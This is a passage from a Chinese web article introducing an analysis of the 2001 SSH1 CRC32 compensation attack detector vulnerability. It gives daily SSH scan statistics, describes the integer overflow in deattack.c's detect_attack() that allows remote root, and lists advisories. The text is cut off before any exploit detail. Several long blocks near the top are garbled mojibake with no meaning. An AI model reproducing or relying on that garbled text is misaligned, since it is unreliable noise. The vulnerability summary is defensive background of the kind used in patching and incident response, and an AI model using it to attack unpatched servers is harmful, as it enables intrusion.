对于SSH crc32 compensation attack detector exploit 的分析

　2008-03-08 11:04:59　来源：WEB开发网　闂傚倸鍊搁崐鎼佸磹閹间礁纾归柟闂寸绾惧綊鏌熼梻瀵割槮缁炬儳缍婇弻鐔兼⒒鐎靛壊妲紒鐐劤缂嶅﹪寮婚悢鍏尖拻閻庨潧澹婂Σ顔剧磼閹冣挃闁硅櫕鎹囬垾鏃堝礃椤忎礁浜鹃柨婵嗙凹缁ㄧ粯銇勯幒瀣仾闁靛洤瀚伴獮鍥敍濮ｆ寧鎹囬弻鐔哥瑹閸喖顬堝銈庡亝缁挸鐣烽崡鐐嶆棃鍩€椤掑嫮宓佸┑鐘插绾句粙鏌涚仦鎹愬闁逞屽墰閹虫捇锝炲┑瀣╅柍杞拌兌閻ゅ懐绱撴担鍓插剱妞ゆ垶鐟╁畷銉р偓锝庡枟閻撴洘銇勯幇闈涗簼缂佽埖姘ㄧ槐鎾诲礃閳哄倻顦板┑顔硷工椤嘲鐣烽幒鎴旀瀻闁规惌鍘借ⅵ濠电姷鏁告慨顓㈠磻閹剧粯鈷戞い鎺嗗亾缂佸鏁婚獮鍡涙倷閸濆嫮顔愬┑鐑囩秵閸撴瑦淇婇懖鈺冪＜闁归偊鍙庡▓婊堟煛鐏炵硶鍋撻幇浣告倯闁硅偐琛ラ埀顒冨皺閺佹牕鈹戦悙鏉戠仸闁圭ǹ鎽滅划鏃堟偨缁嬭锕傛煕閺囥劌鐏犻柛鎰ㄥ亾婵＄偑鍊栭崝锕€顭块埀顒佺箾瀹€濠侀偗婵﹨娅ｇ槐鎺懳熺拠鑼舵暱闂備胶枪濞寸兘寮拠宸殨濠电姵纰嶉弲鎻掝熆鐠虹尨宸ョ€规挸妫濆铏圭磼濡搫顫嶇紓浣风劍閹稿啿鐣烽幋锕€绠婚悹鍥у级瀹撳秴顪冮妶鍡樺鞍缂佸鍨剁粋宥夋倷椤掍礁寮垮┑鈽嗗灣閸樠勭妤ｅ啯鍊垫慨妯煎亾鐎氾拷

闂傚倸鍊搁崐鎼佸磹閹间礁纾归柟闂寸绾惧綊鏌熼梻瀵割槮缁炬儳缍婇弻鐔兼⒒鐎靛壊妲紒鐐劤缂嶅﹪寮婚悢鍏尖拻閻庨潧澹婂Σ顔剧磼閹冣挃闁硅櫕鎹囬垾鏃堝礃椤忎礁浜鹃柨婵嗙凹缁ㄥジ鏌熼惂鍝ョМ闁哄矉缍侀、姗€鎮欓幖顓燁棧闂備線娼уΛ娆戞暜閹烘缍栨繝闈涱儐閺呮煡鏌涘☉鍗炲妞ゃ儲鑹鹃埞鎴炲箠闁稿﹥顨嗛幈銊╂倻閽樺锛涘┑鐐村灍閹崇偤宕堕浣镐缓缂備礁顑嗙€笛囨倵椤掑嫭鈷戦柣鐔告緲閳锋梻绱掗鍛仸鐎规洘鍨块獮鍥偋閸垹骞嶇紓鍌氬€烽悞锕傛晪缂備焦銇嗛崶銊у帗閻熸粍绮撳畷婊堟晝閸屾氨鐓戦梺鍛婂姦閻撳牆岣块弽顓熺厱婵犻潧妫楅悵鏃傛喐閺傝法鏆﹂柟顖炲亰濡茬偓绻涚€电ǹ孝闁靛牏枪椤繘鎼圭憴鍕彴闂佽偐鈷堥崜娑㈩敊婢舵劖鈷戦柣鎾虫捣缁夎櫣绱掗悩宕囧⒌妤犵偛鍟妶锝夊礃閳轰讲鍋撴繝姘參婵☆垯璀﹀Σ濂告煙閼恒儲绀嬫慨濠冩そ濡啫鈽夋潏顭戔偓鍡樼節绾版ǚ鍋撻搹顐㈡灎閻庤娲忛崹浠嬪箖娴犲宸濆┑鐐靛亾鐎氬ジ姊洪懡銈呮瀾闁荤喆鍎抽埀顒佹皑閸忔ê鐣烽婵堢杸婵炴垶鐟ч崢閬嶆⒑缂佹◤顏嗗椤撶喐娅犻柣銏犳啞閻撳繘鏌涢埄鍐炬當闁逞屽墮濠€杈╃磽閹惧顩烽悗锝庝簻缁愭稒绻濋悽闈浶㈤悗姘煎墴閻涱噣宕奸妷锔规嫼缂佺虎鍘奸幊搴ㄋ夊澶嬬厵婵炶尪顔婄花鑺ヤ繆閸欏濮嶇€殿喗鎸抽幃銏ゅ传閸曘劌褰忛梻鍌氬€搁崐鎼佸磹妞嬪孩顐芥慨姗嗗厳缂傛氨鎲稿鍥у疾闂備線娼ч悧鍡椕洪悩璇茬；闁圭偓鍓氬ḿ鈺傘亜閹扳晛鐏╃紒渚囧櫍濮婅櫣绱掑Ο鍦箒闂侀潻缍囩紞渚€鎮伴鈧獮鎺楀箠閾忣偅顥堥柛鈹惧亾濡炪倖甯掗崐缁樼▔瀹ュ鐓ユ繝闈涙椤ョ姷绱掗埦鈧崑鎾绘⒒閸屾艾鈧悂鎮ф繝鍕煓闁硅揪绠戝Ч鍙夌箾閸℃璐╅柣鐔稿閸亪鏌涢鐘茬伄闁哄棭鍋婂娲传閸曨厾鍔圭紓鍌氱С閻掞箓骞堥妸鈺佺劦妞ゆ帒瀚悡鍐煙椤栨粌顣肩痪顓犲亾缁绘繈鍩€椤掍焦缍囬柕濞у懎楠勯梻浣告惈濞层劑宕伴幘璺哄К闁逞屽墮閳规垿顢欓弬銈勭返闂佸憡锕㈢粻鏍х暦閵忋倖鍋ㄩ柛娑樑堥幏铏圭磽閸屾瑧鍔嶉柨姘攽椤曞棛鐣甸柡灞剧洴楠炴﹢寮堕幋婵囨嚈闂備浇顕栭崰妤勬懌濠电偟鍘х换妯讳繆閹间礁围闁搞儮鏅濋弳浼存⒒閸屾瑧顦︽繝鈧潏鈺佸灊妞ゆ牗绮嶉弳婊堟煟閹邦剛鎽犳繛鍛У缁绘盯骞嬮悙瀵告缂佺偓宕橀崑鎰閹惧瓨濯撮悹鎰靛灣缁辨澘鈹戦悙鏉戠祷妞ゆ洦鍙冮崺鈧い鎺戝枤濞兼劖绻涢崣澶屽ⅹ闁伙絿鍏橀、妤呭礃椤忓啰鑳洪梻鍌氬€风粈渚€骞夐敓鐘茬闁哄洢鍨归悿顕€鏌ｅΟ娆惧殭缂佲偓閸喓绡€闂傚牊绋撴晶娑氣偓瑙勬礀瀵墎鎹㈠☉銏犵闁绘劑鍔庣槐浼存⒑閸濆嫭顥滄俊顐ｎ殜閸╃偤骞嬮敂钘変汗闁哄鐗滈崑鍕储閿熺姵鈷戦弶鐐村閸斿秹鏌ｅΔ浣虹煂婵″弶鍔欓獮妯尖偓娑櫭鎾寸箾鐎电ǹ孝妞ゆ垵鎳橀獮妤呮偨閸涘ň鎷洪梺闈╁瘜閸樹粙宕甸埀顒€鈹戦悙鑼勾闁稿﹥绻堥獮鍐┿偅閸愨晛鈧鏌﹀Ο渚Ш妞ゆ柨锕铏规喆閸曨剙鍓归梺鍛娒肩划娆忕暦閹剧粯鍋ㄩ柛娑樑堥幏娲⒑閼姐倕鏋戞繝銏★耿楠炲啯绗熼埀顒勫蓟閿濆绠抽柣鎰暩閺嗐倝姊虹拠鈥虫灍妞ゃ劌锕悰顕€寮介妸锕€顎撻梺绋跨箰椤︽壆鈧俺妫勯埞鎴︽倷閼搁潧娑х紓浣瑰絻濞尖€崇暦閺囥垹围濠㈣泛锕ら幆鐐烘⒑闁偛鑻晶瀛樻叏婵犲啯銇濇鐐寸墵閹瑥霉鐎ｎ亙澹曢梺鍝勭▉閸樹粙宕戠€ｎ喗鐓熸俊顖氱仢閸氬湱鈧鎸风欢姘舵偂椤愶箑鐐婇柕濞р偓婵洭姊洪崫鍕櫤闁诡喖鍊垮濠氬Ω閳哄倸浜為梺绋挎湰缁嬫垿顢旈敓锟�

婵犵數濮烽弫鍛婃叏閻戣棄鏋侀柛娑橈攻閸欏繘鏌ｉ幋锝嗩棄闁哄绶氶弻娑樷槈濮楀牊鏁鹃梺鍛婄懃缁绘﹢寮婚敐澶婄闁挎繂妫Λ鍕⒑閸濆嫷鍎庣紒鑸靛哺瀵鈽夊Ο閿嬵潔濠殿喗顨呴悧濠囧极妤ｅ啯鈷戦柛娑橈功閹冲啰绱掔紒妯虹伌濠碉紕鏁诲畷鐔碱敍濮橀硸鍟嬮梻浣告啞椤ㄥ牓宕戦悢鍝ヮ浄闁兼祴鏅濈壕钘壝归敐鍛儓妞ゅ骸鐭傞弻娑㈠Ω閵壯冪厽閻庢鍠涢褔鍩ユ径鎰潊闁绘ḿ鏁搁弶鎼佹⒒閸屾艾鈧悂鎮ф繝鍕煓闁圭儤顨嗛崐鍫曟煕椤愮姴鍔滈柛濠勬暬閺岋綁鎮㈤崫鍕垫毉闂佸摜鍠撻崑鐔烘閹烘梹瀚氶柟缁樺笚濞堢粯绻濈喊澶岀？闁轰浇顕ч悾鐑芥偄绾拌鲸鏅┑顔斤耿绾悂宕€ｎ喗鈷戦悹鍥ㄧ叀閸欏嫭绻涙担鍐叉搐缁犵儤绻濇繝鍌滃闁稿鏅涢埞鎴﹀磼濮橆厼鏆堥梺鎶芥敱閸ㄥ綊鎯€椤忓牜鏁囬柣鎰綑椤庢稑鈹戦悙鎻掓倯闁告梹鐗滈幑銏犫槈閵忊€虫濡炪倖宸婚崑鎾绘煛鐎ｎ亜顒㈤柕鍥у椤㈡洟濮€閵忋埄鍞虹紓鍌欐祰妞村摜鏁幒鏇犱航闂備礁鍚嬬粊鎾疾濠婂牆鍚圭€光偓閸曨兘鎷绘繛鎾村焹閸嬫捇鏌嶈閸撴盯宕戝☉銏″殣妞ゆ牗绋掑▍鐘炽亜閺冨洤浜归柡鍡楁閺屻劌鈹戦崱娆忣暫闂佸憡鏌ㄩ悘姘跺Φ閸曨垱鏅滈柣锝呰嫰瀵劑姊虹拠鈥虫珯缂佺粯绻冩穱濠囨嚋闂堟稓绐為柣搴秵閸撴瑧鏁ィ鍐┾拻濞达絿枪椤ュ繘鏌涚€ｎ亝鍣介柟骞垮灲瀹曟﹢顢欓懖鈺嬬幢婵＄偑鍊曠换鎰板箠閹邦喚涓嶉柛鎾椻偓閸嬫捇鎮烽弶娆炬闂佸摜濮靛ú婊堟嚍鏉堛劎绡€婵﹩鍓涢悾楣冩⒑缂佹ɑ鐓ラ柛姘儔閸╂盯骞嬮敂钘夆偓鐢告煕閿旇骞栭弽锟犳⒑闂堟稒顥滈柛鐔告尦瀵濡舵径濠勵槰闂佽偐鈷堥崜娆撴偂閻斿吋鍊甸悷娆忓缁€鍐磼鐠囪尙澧︾€殿噮鍋婂畷姗€顢欓懖鈺佸Е婵＄偑鍊栫敮鎺斺偓姘€鍥х劦妞ゆ帊鐒﹂ˉ鍫⑩偓瑙勬礃閿曘垽銆佸▎鎾冲簥濠㈣鍨板ú锕傛偂閺囥垺鐓冮柍杞扮閺嬨倖绻涢崼鐕傝€块柡宀嬬秮閹垻绮欓崹顕呮綒婵犳鍠栭敃銉ヮ渻娴犲绠栭柍鈺佸暞閸庣喖鏌嶉埡浣告殲闁伙讣缍佸缁樻媴閾忕懓绗￠梺缁橆殕濞茬喐淇婇崜浣虹煓閻犳亽鍔嶅▓楣冩⒑缂佹ê鐏﹀畝锝堟硶瀵囧焵椤掑嫭鈷戦柟鑲╁仜閸斺偓闂佸憡鍔戦崝搴ㄥΧ椤曗偓濮婂宕掑▎鎴犵崲濠电偘鍖犻崟鍨啍闂婎偄娲﹀ú姗€锝為弴銏＄厸闁搞儯鍎遍悘鈺呮煕鐏炶濡介柕鍥у缁犳盯骞樼捄渚澑闂備焦濞婇弨閬嶅垂閸ф钃熼柣鏂垮悑閸ゅ啴鏌嶆潪鐗堫樂缂侇喖鐖煎娲川婵犲啠鎷瑰銈冨妼閿曨亜顕ｆ繝姘櫢闁绘ɑ褰冪粣娑橆渻閵堝棙顥堥柡渚囧枟閹便劑宕堕埡鍐紳婵炶揪绲挎灙闁逞屽墮濠€閬嶅极椤曗偓閹垺淇婇幘铏窛闁逞屽墴濞佳囧箺濠婂懎顥氬┑鍌溓圭痪褔鏌涢锝団槈濠德ゅ亹缁辨帒螖娴ｄ警鏆＄紓浣虹帛閻╊垶骞冮埄鍐╁劅闁挎繂娴傞崯瀣⒒娴ｈ櫣銆婇柡鍌欑窔瀹曟粌鈹戠€ｎ亞顔嗛梺鍛婄☉閻°劑鎮￠妷鈺傚€甸柨婵嗘噽娴犳稓绱撳鍡╂疁婵﹤顭峰畷鎺戭潩椤戣棄浜剧€瑰嫭鍣磋ぐ鎺戠倞鐟滄粌霉閺嶎厽鐓忓┑鐐靛亾濞呭棝鏌涙繝鍌涘仴闁哄被鍔戝鎾倷濞村浜鹃柛婵勫劤娑撳秹鏌＄仦璇插姕闁绘挻娲熼弻鏇熷緞濡儤鐏堟繝鈷€灞芥珝闁哄矉绱曢埀顒婄岛閺呮繄绮ｉ弮鍫熺厸鐎光偓閳ь剟宕伴弽褏鏆︽繝濠傛－濡查箖鏌ｉ姀鈺佺仭闁烩晩鍨跺濠氭晸閻樻彃绐涘銈嗘濡嫰鍩€椤掍礁濮嶉柡宀嬬磿娴狅妇鎷犻幓鎺濇綆闂備浇顕栭崰鎾诲磹濠靛棛鏆﹂柟鐑樺灍濡插牊鎱ㄥΔ鈧Λ鏃傛閿燂拷闂傚倸鍊搁崐鎼佸磹閹间礁纾归柟闂寸绾惧綊鏌熼梻瀵割槮缁炬儳缍婇弻鐔兼⒒鐎靛壊妲紒鐐劤缂嶅﹪寮婚悢鍏尖拻閻庨潧澹婂Σ顔剧磼閹冣挃闁硅櫕鎹囬垾鏃堝礃椤忎礁浜鹃柨婵嗙凹缁ㄧ粯銇勯幒瀣仾闁靛洤瀚伴獮鍥敍濮ｆ寧鎹囬弻鐔哥瑹閸喖顬堝銈庡亝缁挸鐣烽崡鐐嶆棃鍩€椤掑嫮宓佸┑鐘插绾句粙鏌涚仦鎹愬闁逞屽墰閹虫捇锝炲┑瀣╅柍杞拌兌閻ゅ懐绱撴担鍓插剱妞ゆ垶鐟╁畷銉р偓锝庡枟閻撴洘銇勯幇闈涗簼缂佽埖姘ㄧ槐鎾诲礃閳哄倻顦板┑顔硷工椤嘲鐣烽幒鎴旀瀻闁规惌鍘借ⅵ濠电姷鏁告慨顓㈠磻閹剧粯鈷戞い鎺嗗亾缂佸鏁婚獮鍡涙倷閸濆嫮顔愬┑鐑囩秵閸撴瑦淇婇懖鈺冪＜闁归偊鍙庡▓婊堟煛鐏炵硶鍋撻幇浣告倯闁硅偐琛ラ埀顒冨皺閺佹牕鈹戦悙鏉戠仸闁圭ǹ鎽滅划鏃堟偨缁嬭锕傛煕閺囥劌鐏犻柛鎰ㄥ亾婵＄偑鍊栭崝锕€顭块埀顒佺箾瀹€濠侀偗婵﹨娅ｇ槐鎺懳熺拠鑼舵暱闂備胶枪濞寸兘寮拠宸殨濠电姵纰嶉弲鎻掝熆鐠虹尨宸ョ€规挸妫濆铏圭磼濡搫顫嶇紓浣风劍閹稿啿鐣烽幋锕€绠婚悹鍥у级瀹撳秴顪冮妶鍡樺鞍缂佸鍨剁粋宥夋倷椤掍礁寮垮┑鈽嗗灣閸樠勭妤ｅ啯鍊垫慨妯煎亾鐎氾拷　　闂傚倸鍊搁崐鎼佸磹閹间礁纾归柟闂寸绾惧綊鏌熼梻瀵割槮缁炬儳缍婇弻鐔兼⒒鐎靛壊妲紒鐐劤缂嶅﹪寮婚悢鍏尖拻閻庨潧澹婂Σ顔剧磼閻愵剙鍔ょ紓宥咃躬瀵鏁愭径濠勵吅闂佹寧绻傞幉娑㈠箻缂佹ḿ鍘遍梺闈涚墕閹冲酣顢旈銏＄厸閻忕偠顕ч埀顒佺箓閻ｇ兘顢曢敃鈧敮闂佹寧妫佹慨銈夋儊鎼粹檧鏀介柣鎰▕閸ょ喎鈹戦鈧ḿ褔锝炲┑瀣╃憸搴綖閺囥垺鐓欓柟瑙勫姦閸ゆ瑧鐥幆褍鎮戠紒缁樼洴瀹曞崬螣閾忓湱鎳嗛梻浣告啞閿曨偆妲愰弴鐘愁潟闁规儳顕悷褰掓煕閵夋垵瀚ぐ顖炴⒒娴ｈ鍋犻柛鏂跨焸閹儵宕楅梻瀵哥畾闂佸湱铏庨崰鏍矆閸愨斂浜滈柡鍐ㄥ€哥敮鍓佺磼閹邦厾娲存慨濠冩そ瀹曨偊宕熼崹顐嵮囨⒑閹肩偛濡肩紓宥咃工閻ｇ兘濮€閻樺棙妞介、鏃堝川椤撴稑浜鹃柛顭戝亽濞堜粙鏌ｉ幇顖氱毢濞寸姰鍨介弻娑㈠籍閳ь剛鍠婂澶娢﹂柛鏇ㄥ灡閺呮粓鎮归崶顏勭毢濞寸姵鎮傞幃妤冩喆閸曨剛鈹涚紓浣虹帛缁诲牓鎮伴鑺ュ劅闁靛⿵绠戝▓鐔兼⒑闂堟冻绱￠柛鎰╁妼椤╊剟姊婚崒姘偓鎼併偑閹绢喖纾婚柛鏇ㄥ€嬪ú顏呮櫇闁逞屽墰閸欏懘姊洪崫鍕犻柛鏂垮閺呭爼鏁撻悩鏂ユ嫽闂佺ǹ鏈悷锔剧矈閻楀牄浜滈柡鍥ф閹冲宕戦幘璇插瀭妞ゆ劑鍨虹拠鐐烘倵鐟欏嫭绀冪紒顔芥崌楠炲啴濮€閿涘嫰妾繝銏ｆ硾椤戝洨绮欐笟鈧缁樻媴閻熸澘濮㈢紓浣虹帛閸旀洟鏁冮姀鈩冪秶闁宠桨绶″Λ婊堟⒑缁嬭法绠绘俊顐ユ硶閹广垽宕卞Ο闀愮盎闂佸搫绉查崝搴ㄣ€傞弻銉︾厵妞ゆ牗姘ㄦ晶娑㈡煏閸パ冾伃妞ゃ垺娲熸慨鈧柕蹇嬪灩婵鲸绻濆▓鍨灈闁挎洏鍔岄埢宥夋晲婢跺﹦顔嗛梺缁樶缚缁垶宕甸幋鐐簻闁圭儤鍨垫禍鐐烘煕閻愰娼愮紒缁樼箓閳绘捇宕归鐣屼憾闂佺厧鐏曢崶銊у幈闂佸搫鍟犻崑鎾绘煕閵娿儳浠㈤柣锝呭槻鐓ゆい蹇撳閸旓箑顪冮妶鍡楃瑐闂傚嫬绉电粋宥呪堪閸喓鍘甸梺鍛婄箓鐎氼喛鍊存俊鐐€х拋锝囩不閹捐钃熸繛鎴欏灩鍥撮柟鑲╄ˉ閳ь剚鏋奸幏顐︽⒒娴ｅ憡鎯堥柡鍫墴閹嫰顢涢悙闈涚ウ濠碘槅鍨伴崥瀣暦婢舵劖鐓熼柟瀵稿亶缂傛岸鏌嶈閸撴繈顢氳閳ユ棃宕橀鍢壯囧箹缁厜鍋撻懠顒傛晨缂傚倸鍊烽懗鍓佸垝椤栫偛绀夋俊銈呮噹閻鏌涘☉鍗炲季婵炴挸顭烽弻鏇㈠醇濠靛洤娅х紓浣哄С閸楁娊骞冨Δ鈧～婵嬫偂鎼粹檧鎷梻浣筋嚃閸犳銆冩繝鍥モ偓浣割潨閳ь剟骞冨⿰鍫濆耿婵☆垵娅ｅΣ锝夋⒒閸屾瑧绐旀繛浣冲洦鍋嬮柛鈩冦亗濞戞ǚ鏋庨柟瀵稿Х閻掑ジ姊洪柅鐐茶嫰婢у瓨鎱ㄦ繝鍐┿仢闁诡喚鍏樺鍫曞箰鎼淬垻妲梻鍌氬€风粈浣规償濠婂懎绶ゅù鐘差儐閸嬧晝鈧懓瀚竟瀣醇椤忓牊鐓曢柡鍥ュ妼娴滀粙鏌涢妶鍐ㄢ偓婵嬪蓟閿濆棙鍎熼柕蹇婃噰婵洭鏌ょ憗銈呪偓婵嬪蓟閻斿吋鐓ラ悗锝庡亖娴犮垹鈹戦纭峰姛缂侇噮鍨崇划顓㈡偄閻撳海鍊為悷婊冪灱閼鸿鲸绂掔€ｎ偀鎷虹紓浣割儐椤戞瑩宕曢幇鐗堢厽闁冲搫锕ら悘锔筋殽閻愯韬柟顔哄灮閸犲﹥娼忛妸锔界彨濠电姷鏁搁崑鐐哄垂閸洘鍋￠柨鏇炲€归崑鐔衡偓鐟板閸嬪﹤銆掓繝姘厪闁割偅绻冮ˉ鐐烘煟閹惧崬鍔氭い顓″劵椤︽挳鏌￠崪浣镐簼缂佹梻鍠栧鎾閳ュ厖绨甸梺鐟板悑閹矂宕板璺鸿埞闁汇垹鎲￠悡鐔兼煟濡厧鍔嬫い蹇曞█閹ǹ绠涚€ｎ亜顫囬悗瑙勬礃缁诲牓骞冮姀銈嗘優闁革富鍙忕槐鎻掆攽閻橆喖鐏辨繛澶嬬〒閳ь剚绋堥弲鐘汇€侀弮鍫熷亹缂備焦岣块崢鎾绘偡濠婂嫮鐭掔€规洘绮岄～婵囷紣濠靛洦娅撻梻浣告惈缁嬩線宕㈤懖鈺冪幓婵°倕鎳忛悡娑氣偓骞垮劚妤犳悂鐛幇鐗堢厓鐟滄粓宕滈妸褏涓嶉柟鎹愵嚙閽冪喖鏌曟繛褉鍋撻柛瀣崌閺佹劙宕掑☉娆戝絿缂傚倷鑳舵慨鐢告嚌妤ｅ啫鐓橀柟杈惧瘜閺佸﹪鏌ｉ敐鍛伇闁伙絿鏁诲鍝劽虹拠鎻掔闂佺粯顨呭Λ妤€鐣甸崟顖涒拺缂備焦锚閻忓崬鈹戦鍝勨偓婵嬪春濞戙垹绠ｉ柣妯兼暩閿涙粓鏌ｆ惔顖滅У闁稿甯″畷鏇㈠Ψ閳哄倻鍘遍柟鍏肩暘閸ㄨ鎱ㄥ澶嬬厸鐎光偓閳ь剟宕伴弽顓炵畺闁绘垼濮ら崑瀣煕椤愩倕鏋戦柛濠勫厴濮婃椽骞戦幇顒€鎯為梺绋款儍閸婃繂顕ｇ拠娴嬫闁靛繒濮烽悿鈧梻浣哥枃濡椼劎绮堟担鍛婃殰婵犵數濮烽。浠嬪礈濠靛ǹ浜归柛鎰靛枟閸嬪鈹戦悩鎻掝仾鐎规洖寮剁换娑㈠箣濞嗗繒浠煎Δ鐘靛亼閸ㄧ儤绌辨繝鍥ч柛娑卞幗濞堣泛顪冮妶鍡樼叆妞わ富鍨堕崺鐐哄箣閿旇棄鈧兘鏌ょ喊鍗炲妞ゃ倐鍋撻梻鍌欑劍鐎笛兠鸿箛娑樺瀭鐟滅増甯紞鏍叓閸ャ劍绀堢痪鎯у悑娣囧﹪顢涘┑鎰濡炪倕瀛╅幐缁樼┍婵犲洦鍊风€瑰壊鍠栭崜鎵磽娴ｉ潧濮€闁稿鍔欓獮澶嬪閺夋垵鑰垮┑鐐叉閸ㄥ綊鏁嶅┑瀣拺缂佸瀵у﹢鐗堟叏濡ǹ濮€闁愁亞鏁诲缁樻媴閸涢潧缍婇、鏍幢濞戞ḿ顔囬梺鐓庮潟閸婃牕鐣烽崣澶岀闁瑰鍋涢悞褰掓煕鐎ｎ偅灏柍钘夘槸閳诲海鈧綆鍓涚粣妤呮⒒娴ｈ銇熼柛妯虹秺瀹曟劕鈹戠€ｎ亣鎽曞┑鐐村灟閸ㄥ湱绮绘繝姘仯闁惧繒鎳撻崝瀣煟韫囨挾澧﹂柟顔筋殘閹叉挳宕熼鍌ゆО婵犵绱曢崑妯煎垝濞嗗繒鏆︽繛宸簻閻掑灚銇勯幒宥夋濞存粍绮撻弻鐔煎传閸曨厜褎淇婇幆褍妲婚棁澶嬬節婵犲倸顏柣顓熷浮閺屸€崇暆閳ь剟宕伴弽顓炵畺婵犲﹤鍚橀悢鍏兼優闂侇偅绋掑Ο濠囨⒒閸屾瑧绐旈柍褜鍓涢崑娑㈡嚐椤栨稒娅犳い鏂垮⒔绾剧晫鈧箍鍎遍幏鎴濐啅閵夛负浜滈柡鍥朵簽缁夘喗顨ラ悙鍙夋崳缂侇喚鏁搁埀顒婄秵閸嬪懎鈻嶅畝鍕拻濞达絽鎲￠崯鐐寸箾鐠囇呯暤鐎规洘绮岄埥澶愬閻樻彃浜堕梻鍌欑贰閸撴瑧绮旈悽鍛婂亗闁绘梻鍘х粻褰掓煙绾板崬骞栭柣蹇ョ悼缁辨帗寰勯幇顓熼敪闂傚洤顦扮换婵囩節閸屾稑娅ｉ梺鍛娚戦幐鎶藉蓟閿濆绠奸柛鎰╁妼閳峰顪冮妶鍐ㄧ仾妞ゃ劌锕ら悾鐑藉箳閹宠櫕妫冮崺鈧い鎺嶈兌椤╂彃螖閿濆懎鏆為柛瀣у墲缁绘盯宕卞Δ鍐唶濡炪倕娴氭禍鐐烘儉椤忓牆绠氱憸婊堟偂婵傚憡鐓涢悘鐐插⒔閳藉鎽堕弽顓熺厓鐟滄粓宕滈悢椋庢殾妞ゆ牜鍋涢柨銈嗕繆閵堝拑鏀婚柡鍜佷邯濮婃椽骞愭惔锝囩暤濡炪倧瀵岄崹铏珶閺嚶颁汗闁圭儤鎸鹃崢浠嬫⒑閸濆嫭澶勬慨妯稿姂瀹曟繂顓兼径瀣垫闁诲函缍嗛崰妤呭煕閹烘鐓曢悘鐐插⒔閹冲懏銇勯敂鑲╃暤闁哄瞼鍠撻崰濠囧础閻愭壆鐩庨梺鎹愬吹閸嬨倝骞冨Δ鍛棃婵炴垶鐟﹂崰鎰箾閹寸偞灏紒澶婄秺瀵鎮㈤悡搴ｎ唹闂侀€涘嵆濞佳冣枔椤撱垺鈷戦柦妯侯槸閺嗙喖鏌涢悩宕囧⒌鐎殿喖顭峰鎾偄閾忚鍟庨梻浣虹帛閸旓箓宕滃鑸靛仧闁哄洢鍨洪埛鎴犵磼鐎ｎ偒鍎ラ柛搴＄箲娣囧﹪顢曢敐鍥╃杽閻庢鍠涢褔鍩ユ径濠庢僵妞ゆ劧绲芥刊浼存⒒娴ｅ憡鍟為柟绋挎閸┾偓妞ゆ巻鍋撻崡閬嶆煕椤愶絿绠ユ繛鎾愁煼閺屾洟宕煎┑鍥ф畻闂佺粯绋掔划鎾诲蓟閻旂厧绀勯柕鍫濇椤忥拷

核心提示：由于SSH crc32 compensation attack detector eXPloit代码的流传开来，对于 SSH的扫描也越来越多，对于SSH crc32 compensation attack detector exploit 的分析，这是一份统计报表： +++--+--+---+ | date　　　 |

由于SSH crc32 compensation attack detector eXPloit代码的流传开来，对于
SSH的扫描也越来越多，这是一份统计报表：

+------------+------------+----------+----------+-----------+
| date　　　 | #PRobes　　| #Sources | #Targets | #Scanners |
+------------+------------+----------+----------+-----------+
| 2001-10-03 |　　　 1466 |　　45　　|　　　987 |　　　　　 |
| 2001-10-04 |　　　　319 |　　25　　|　　　212 |　　　　　 |
| 2001-10-05 |　　　　825 |　　22　　|　　　783 |　　　　　 |
| 2001-10-06 |　　　86552 |　　27　　|　　86305 |　　　　　 |　　　
| 2001-10-07 |　　　 7564 |　　29　　|　　 7429 |　　　　　 |
| 2001-10-08 |　　　 2506 |　　29　　|　　 2449 |　　　　　 |
| 2001-10-09 |　　　 1010 |　　18　　|　　　263 |　　　　　 |
| 2001-10-10 |　　　　480 |　　39　　|　　　307 |　　　　　 |
| 2001-10-11 |　　　　978 |　　31　　|　　　504 |　　　　　 |
| 2001-10-12 |　　　　436 |　　21　　|　　　311 |　　　　　 |
| 2001-10-13 |　　　 6731 |　　27　　|　　 6353 |　　　　　 |
| 2001-10-14 |　　　 1411 |　　29　　|　　 1084 |　　　　　 |
| 2001-10-15 |　　　　936 |　　34　　|　　　723 |　　　　　 |
| 2001-10-16 |　　　 1358 |　　40　　|　　 1256 |　　　　　 |
| 2001-10-17 |　　　 1098 |　　36　　|　　　899 |　　　　　 |
| 2001-10-18 |　　　 1779 |　　31　　|　　 1438 |　　　　　 |
| 2001-10-19 |　　　19722 |　　28　　|　　19573 |　　 7　　 |
| 2001-10-20 |　　　25539 |　　21　　|　　25419 |　　 3　　 |
| 2001-10-21 |　　　 6796 |　　26　　|　　 6750 |　　 9　　 |
| 2001-10-22 |　　　　807 |　　30　　|　　　482 |　　 5　　 |
| 2001-10-23 |　　　　578 |　　49　　|　　　327 |　　 6　　 |
| 2001-10-24 |　　　 2198 |　　39　　|　　 2025 |　　 9　　 |
| 2001-10-25 |　　　 2368 |　　31　　|　　 1759 |　　 6　　 |
| 2001-10-26 |　　　　712 |　　37　　|　　　591 |　　 7　　 |
| 2001-10-27 |　　　　463 |　　30　　|　　　297 |　　 8　　 |
| 2001-10-28 |　　　　495 |　　30　　|　　　263 |　　 5　　 |
| 2001-10-29 |　　　　478 |　　37　　|　　　399 |　　 5　　 |
| 2001-10-30 |　　　 1154 |　　48　　|　　 1051 |　　 5　　 |
| 2001-10-31 |　　　 1998 |　　46　　|　　 1047 |　　 5　　 |
| 2001-11-01 |　　　66660 |　　46　　|　　66386 |　　 5　　 |
| 2001-11-02 |　　　 1514 |　　40　　|　　　926 |　　 5　　 |
| 2001-11-03 |　　　 2142 |　　36　　|　　 2047 |　　 8　　 |
| 2001-11-04 |　　　 1233 |　　26　　|　　　781 |　　 9　　 |
+------------+------------+----------+----------+-----------+

鉴于此情况，编译整理David A. Dittrich <dittrich@cac.washington.edu> 文章(http://staff.washington.edu/dittrich/misc/ssh-analysis.txt)供大家参考和修补。

-------------------------------------------------------------------------------

概述
==================

此漏洞最开始由CORE-SDI组织在securityfocus.com上的BUGTRAQ上发布了他们安全
公告CORE-20010207，日期为2001,2月8号：

http://www.securityfocus.com/advisories/3088

漏洞的简单描述就是：ssh1守护程序中所带的一段代码中存在一个整数溢出问题。问题出在
deattack.c,此程序由CORE SDI开发，用来防止SSH1协议受到CRC32补偿攻击。

由于在detect_attack()函数中错误的将一个16位的无符号变量当成了32位变量来使用，导致表索引溢出问题。

这将答应一个攻击者覆盖内存中的任意位置的内容，攻击者可能远程获取root权限。

其他组织也陆续公布了一些对这个SSH 漏洞的分析和建议如：

　　　 http://xforce.iss.net/alerts/advise100.php

　　　 http://razor.bindview.com/publish/advisories/adv_ssh1crc.Html
　　　 http://www.securityfocus.com/bugid=2347

而在2001年10月21号Jay Dyson在incidents@securityfocus.com邮件列表上声明
有不少信息显示有人在扫描RipE 网络段的SSH服务器：

